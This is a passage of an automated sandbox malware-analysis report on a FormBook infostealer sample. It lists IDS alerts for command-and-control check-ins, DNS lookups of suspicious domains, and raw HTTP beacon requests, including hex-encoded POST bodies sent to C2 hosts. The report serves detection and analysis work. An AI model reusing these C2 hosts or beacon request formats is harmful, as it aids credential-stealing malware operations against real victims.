                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49199 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49193 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49189 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49215 -> 69.48.179.238:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49186 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49204 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49198 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49206 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49200 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49197 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49170 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49192 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49185 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49214 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49208 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49202 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49209 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49201 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49212 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49194 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49210 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49213 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49207 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49190 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49211 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49191 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49205 -> 81.2.196.19:80
                Performs DNS queries to domains with low reputation
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeDNS query: www.zoiheat.xyz
                Source: unknownNetwork traffic detected: IP country count 10
                Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
                Source: Joe Sandbox ViewIP Address: 146.88.233.115 146.88.233.115
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: INTERNET-CZKtis238403KtisCZ INTERNET-CZKtis238403KtisCZ
                Source: C:\Windows\SysWOW64\msinfo32.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3270000[1].zipJump to behavior
                Source: global trafficHTTP traffic detected: GET /ti6k/?e2E=wRQ8oHXx&x4=aooN9XnxZY5vLLqjRSo6DpWN4fgsD3CW9S/CD7OrytslWQsmx2XgIWNhq2ot6qnFvMzcVXyCAoOGhogdqicJCN8EOoBxC+Cz12DK8fUp+S6/f8QxRRTszX5C8Y75 HTTP/1.1Host: www.zoiheat.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2019/sqlite-dll-win32-x86-3270000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /1yxc/?x4=sNv20zOiDYMkOMIZUAMTdfOFf2lUUMo2G3KMZ1n3ZrvJqNyjokS5weFlZhKtUuMXj8jBQ4ipfeoXnmxfx9jFO8nPHTBXwG0erHwEdD0EmkjwsdzIUyNTuEGbdIq/&e2E=wRQ8oHXx HTTP/1.1Host: www.questmatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&e2E=wRQ8oHXx HTTP/1.1Host: www.mrpokrovskii.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /zu0o/?x4=b+T4d2yBdzwUctMejPOupP2kAcsd/nhPUeEaq4sP5cuMDP5lcr7xps31yZ0v/SBMA/DffJ2wWiPafQM+LvQwNtI7bwedqUnBbu8V9j+TNLUtBYOc7+oiqpinqR9T&e2E=wRQ8oHXx HTTP/1.1Host: www.kvsj.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n8su/?e2E=wRQ8oHXx&x4=lFR6PBva/PMsONRXI0WwK0wAlPs3/3LGo4dEt9E07rmpJDSADrt1oQ5wEpxa5wprSOBn2CzJO8jS1Mfo/039O8MFhYDOYZlyw2UFRkURX7D2yJawivbRUB3rqqzd HTTP/1.1Host: www.learniit.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /an5q/?x4=ht9kvQ/be1JP/b8GmoJbUpka8BxXZHDjKA2fsfIfXx0uGnoFDxCnuQ2Syamf2AV1LytjWJjmrwJ3QA9mKPa/MpeqH9CIj747RQUAZUa71OOzgLnsSxYrvroJ5BNI&e2E=wRQ8oHXx HTTP/1.1Host: www.bankseedz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ugyg/?x4=oCZiSXk+P+GRfK1BPGYe2jAbGy6NfuRnUXBBKsmFkR5XdaXHzOV8cRyPm0SlplEQyKXzoexQZCmJiHD77mrvft/NmZQ5KxY7IzFSGPZt8SE9dF3swuxanCIPkslF&e2E=wRQ8oHXx HTTP/1.1Host: www.dietcoffee.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /m1g9/?x4=Cu+laRdL4iPyeXPOvnXbHATCRLbFtZvgmbFpChU/EeiHg3j+sEFT+StkZuqTMzkW17xuxTA+IyjM3SxoNr0bNIrAJ4iZv6YB/kmuH0GNS74UnHLgt4utBlkurB62&e2E=wRQ8oHXx HTTP/1.1Host: www.smartcongress.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8mom/?e2E=wRQ8oHXx&x4=v3XpYZPN786X74upleiKtnNLTnr+c+QwOZfu2m4ZpmP7p96MXgDDhh7sLakM2W7qG0VyTnNwFXquJXbjGrCq/za7/jRofJkRFgfW/Ij12v4wAiV6r71IBPX8JcSc HTTP/1.1Host: www.carsten.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /5p01/?x4=gA6TElZrCKVvAudJqCgIj+rDW60O9S/KrsL6QppRHZfK3DYPsJvxk4hrjtesZ+QJ9tNiW026ZluxU0disiqWvA+4TRd5XHrMIpgHSW93WHtTmPUKepAYQ6lEihd3&e2E=wRQ8oHXx HTTP/1.1Host: www.krshop.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /k6bb/?e2E=wRQ8oHXx&x4=Z6Ib5suwfioT2MqU06AO+PAui2zXunW520tiYNnV3r2mKqn+I/1Rk8X6nyOI9yPQWIZ7sVBW06SOuYuNHwSa/K8QYKA8w9Q0BnY6RfjXUsKFmlTp4Coq9mQ/L3NZ HTTP/1.1Host: www.rysanekbeton.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gvzg/?x4=3ZtrxXVK8OpQj/IeinJ3ZiXeAcGxlO+Pqtakmq6NsaDAWPHTfqsTTp3MR0RJjMVggAZP9MES5OMDJz4L+ZnM27rh6ujY7a8DVehBMFx021rrXiLY5F9HpwIHbLcF&e2E=wRQ8oHXx HTTP/1.1Host: www.airrelax.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ge5i/?x4=jPU0HPuwZISEZ5CnqmUb1HxQcmHsEJWSHx9v/3j//xH9iOmom18fULHPXhZRerzvXxOw9xjpncAMgCVYCBSLizB0ok2+/BrdQFUexat22mesfNVGJAdc0xNIeHt8&e2E=wRQ8oHXx HTTP/1.1Host: www.vayui.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.zoiheat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
                Source: global trafficDNS traffic detected: DNS query: www.questmatch.pro
                Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
                Source: global trafficDNS traffic detected: DNS query: www.sodatool.site
                Source: global trafficDNS traffic detected: DNS query: www.tb0.shop
                Source: global trafficDNS traffic detected: DNS query: www.kvsj.net
                Source: global trafficDNS traffic detected: DNS query: www.learniit.info
                Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                Source: global trafficDNS traffic detected: DNS query: www.carsten.studio
                Source: global trafficDNS traffic detected: DNS query: www.krshop.shop
                Source: global trafficDNS traffic detected: DNS query: www.rysanekbeton.cloud
                Source: global trafficDNS traffic detected: DNS query: www.airrelax.shop
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.diozusemails.buzz
                Source: unknownHTTP traffic detected: POST /1yxc/ HTTP/1.1Host: www.questmatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.questmatch.proReferer: http://www.questmatch.pro/1yxc/Content-Length: 2159Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36Data Raw: 78 34 3d 68 50 48 57 33 44 36 55 44 36 46 62 58 4f 73 55 4a 6c 64 67 64 65 47 73 5a 43 51 6b 44 36 35 53 43 41 53 68 64 46 37 79 54 38 69 67 76 4a 53 61 67 32 48 72 31 50 52 36 4c 6d 4f 46 53 65 42 70 34 74 4b 41 51 72 53 77 48 76 30 49 38 56 5a 78 31 66 32 62 4e 50 7a 4a 47 7a 6c 74 74 56 5a 6e 70 45 55 45 62 52 73 35 2b 46 76 63 71 71 7a 77 51 41 35 4b 6d 6b 75 54 4e 59 2f 6a 46 35 38 61 66 6d 31 66 76 71 32 6a 34 73 4b 6c 50 42 61 66 46 75 2b 47 4f 55 72 69 57 4a 51 66 6d 31 69 4b 31 51 78 51 76 63 6d 74 57 6c 36 70 33 78 47 66 32 64 48 55 2f 67 6b 68 63 43 70 4b 58 4d 68 31 44 5a 5a 7a 6f 45 6d 48 31 62 56 2b 68 6f 68 32 77 35 66 54 45 36 50 6b 76 65 32 49 33 65 75 61 6e 34 75 74 6e 6f 70 79 50 66 41 69 52 78 36 4c 37 46 53 57 57 31 50 64 53 44 59 49 51 62 4b 6c 64 79 70 64 73 4f 65 5a 4e 38 74 38 57 77 47 66 38 58 39 52 76 34 41 30 45 43 69 69 41 71 69 45 34 30 6c 32 48 71 31 65 38 38 48 45 4c 71 49 6f 4f 56 4a 44 72 6b 66 78 66 50 32 33 61 55 70 72 44 48 4a 33 6c 71 78 4d 66 5a 53 62 72 68 66 57 4a 6f 71 58 6e 73 4d 6f 63 6e 54 43 6a 7a 2b 51 6d 69 72 35 70 6c 6c 62 5a 75 4f 34 74 63 2f 34 6e 62 33 6b 4c 39 4b 2b 6e 2f 65 34 33 6a 50 61 73 6f 50 62 66 4b 46 73 43 79 64 42 37 45 30 59 49 5a 44 76 30 77 32 63 6c 6d 78 45 33 32 33 69 66 57 7a 30 69 74 2f 69 50 52 75 5a 54 7a 57 63 5a 4a 57 69 62 32 79 6b 42 4d 30 5a 39 55 55 6f 67 65 42 6d 54 68 49 42 5a 61 5a 34 30 57 34 50 66 42 64 56 6d 74 6a 76 57 59 73 74 6a 74 53 69 71 6b 4e 50 2b 57 52 6f 70 79 4f 59 7a 33 4e 31 71 4c 6e 33 33 50 6c 70 65 62 41 4b 4e 48 67 59 38 37 59 4e 68 4b 42 46 41 49 35 78 78 30 52 6b 64 48 58 65 76 35 4c 56 4b 46 65 35 45 54 75 4a 36 6b 6d 68 73 4d 2f 44 48 74 44 50 53 73 79 4f 52 37 56 67 76 65 2f 46 57 53 63 38 74 36 4f 6e 37 4a 61 33 30 4f 46 67 41 76 44 56 68 56 54 72 39 4d 50 45 31 6c 4b 55 52 68 77 57 45 7a 52 31 59 2b 38 6a 62 39 6e 41 39 6a 77 4f 44 43 32 6d 42 64 30 58 68 4f 4b 38 4b 6f 48 42 59 7a 64 39 6e 47 4d 34 69 4a 57 7a 64 48 70 57 36 64 72 56 69 31 56 51 6b 6a 6f 48 38 34 37 52 4c 6b 6b 63 36 35 6f 47 64 68 51 70 33 36 4d 67 79 48 33 55 7a 6e 53 47 4c 6c 6f 68 52 53 39 38 52 70 41 6e 45 6f 35 52 44 58 44 30 4c 61 75 49 54 33 5a 35 6b 6b 4e 6e 75 2b 6b 46 79 6e 52 72 70 6b 44 31 42 41 4b 31 65 58 71 79 36 77 6f 6e 66 32 71 58 73 77 2f 65 45 32 4c 38 6b 76 48 4b 53 79 4d 54 75 62 43 47 50 65 4b 42 61 4f 70 69 66 59 71 31 4a 2b 67 74 73 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 12 Dec 2024 09:20:15 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-12T09:20:20.7730248Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:32 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 